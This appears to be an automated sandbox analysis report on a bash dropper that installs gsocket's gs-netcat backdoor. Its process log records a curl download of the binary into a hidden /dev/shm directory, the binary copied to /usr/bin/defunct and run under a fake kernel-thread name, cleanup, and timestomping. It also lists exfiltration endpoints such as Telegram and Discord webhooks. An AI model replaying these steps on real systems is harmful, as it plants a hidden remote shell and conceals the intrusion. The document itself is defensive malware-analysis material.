Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
y
|
Bourne-Again shell script, ASCII text executable
|
initial sample
|
||
/dev/shm/.gs-0/gs-netcat_mini-linux-x86_64
|
ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, stripped
|
dropped
|
||
/usr/bin/defunct
|
ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, stripped
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/usr/bin/bash
|
/usr/bin/bash /tmp/y
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/uname
|
uname -m
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/base64
|
base64 -w0
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/base64
|
base64 -d
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/sed
|
sed s/[^a-zA-Z0-9]/\\\\&/g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/pgrep
|
pgrep defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/pgrep
|
pgrep (\\[kstrp\\]|\\[watchdogd\\]|\\[ksmd\\]|\\[kswapd0\\]|\\[card0\\-crtc8\\]|\\[mm\\_percpu\\_wq\\]|\\[rcu\\_preempt\\]|\\[kworker\\]|\\[raid5wq\\]|\\[slub\\_flushwq\\]|\\[netns\\]|\\[kaluad\\])
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/bin/bash
|
/bin/bash -c "echo TRUE"
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/dirname
|
dirname /dev/shm/.gs-0
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/dirname
|
dirname /dev/shm
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/date
|
date -r /dev/shm +%Y%m%d%H%M.%S
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/dirname
|
dirname /dev/shm/.gs-0
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/ls
|
ls -atr /dev/shm
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/head
|
head -n1
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/date
|
date -r /dev/shm/.. +%Y%m%d%H%M.%S
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/mkdir
|
mkdir /dev/shm/.gs-0
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/chmod
|
chmod 700 /dev/shm/.gs-0
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/touch
|
touch /dev/shm/.gs-0/.gs-rw.lock
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/rm
|
rm -f /dev/shm/.gs-0/.gs-rw.lock
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/dirname
|
dirname /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/dirname
|
dirname /usr/bin
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/date
|
date -r /usr/bin +%Y%m%d%H%M.%S
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/dirname
|
dirname /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/ls
|
ls -atr /usr/bin
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/head
|
head -n1
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/date
|
date -r /usr/bin/dirsplit +%Y%m%d%H%M.%S
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/touch
|
touch /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/chmod
|
chmod 600 /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/basename
|
basename /bin/true
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/dirname
|
dirname /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/base64
|
base64 -w0
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/base64
|
base64 -w0
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/base64
|
base64 -w0
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/curl
|
curl -fsSL --connect-timeout 7 -m900 --retry 3 https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 --output /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/mv
|
mv /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 /dev/shm/.gs-0/gs-netcat
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/dirname
|
dirname /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/rm
|
rm -f /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/dirname
|
dirname /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/touch
|
touch /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/chmod
|
chmod 600 /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/cp
|
cp /dev/shm/.gs-0/gs-netcat /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/dirname
|
dirname /dev/shm/.gs-0/gs-netcat
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/rm
|
rm -f /dev/shm/.gs-0/gs-netcat
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/chmod
|
chmod 700 /usr/bin/defunct
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/defunct
|
/usr/bin/defunct -g
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/defunct
|
[slub_flushwq]
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/rm
|
rm -rf /dev/shm/.gs-0/*
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/rmdir
|
rmdir /dev/shm/.gs-0
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/touch
|
touch -t 202410010411.39 /dev/shm
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/touch
|
touch -t 202109170423.51 /usr/bin
|
||
/usr/bin/bash
|
-
|
||
/usr/bin/touch
|
touch -t 200611251713.29 /usr/bin/defunct
|
There are 168 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://www.gsocket.io/deploy/
|
unknown
|
||
https://cdn.gsocket.io
|
unknown
|
||
https://github.com/hackerschoice/gsocket-relay
|
unknown
|
||
https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64
|
92.60.39.208
|
||
https://foo.blah/log.php?s=
|
unknown
|
||
https://gsocket.io
|
unknown
|
||
https://t.me/thcorg$
|
unknown
|
||
https://webhook.site
|
unknown
|
||
https://github.com/hackerschoice/gsocket/releases$
|
unknown
|
||
https://webhook.site/$
|
unknown
|
||
https://api.telegram.org/bot$
|
unknown
|
||
https://discord.com/api/webhooks/$
|
unknown
|
||
https://gsocket.io/x)
|
unknown
|
There are 3 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
cdn.gsocket.io
|
92.60.39.208
|
||
c.gs.thc.org
|
45.14.164.3
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
92.60.39.208
|
cdn.gsocket.io
|
Germany
|
||
109.202.202.202
|
unknown
|
Switzerland
|
||
45.14.164.3
|
c.gs.thc.org
|
Germany
|
||
91.189.91.43
|
unknown
|
United Kingdom
|
||
91.189.91.42
|
unknown
|
United Kingdom
|